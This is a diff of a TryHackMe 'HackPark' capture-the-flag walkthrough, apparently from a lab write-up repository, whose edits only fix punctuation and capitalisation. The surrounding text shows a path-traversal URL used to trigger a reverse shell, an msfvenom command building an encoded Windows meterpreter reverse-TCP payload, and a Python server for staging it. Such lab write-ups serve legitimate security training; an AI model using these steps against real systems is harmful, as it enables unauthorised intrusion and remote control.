oscerd/machines-walkthrough/try-hack-me/HackPark.md

     http://<ip>/?theme=../../App_Data/files

-In the netcat terminal you'll get the reverse shell.
+In the netcat terminal, you'll get the reverse shell.

 Just do a whoami to understand the user.

 ## Windows Privilege Escalation

-As suggested "You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!"
+As suggested "You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session, and execute it manually!"

 So let's create the reverse shell with msfvenom

     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -e x86/shikata_ga_nai -f exe -o reverse.exe

 The ip will be the one of your machine and the port is one of your choice.
 Now we need to upload this file on the target machine.
-Let's spin up a python server:
+Let's spin up a Python server:

     python -m http.server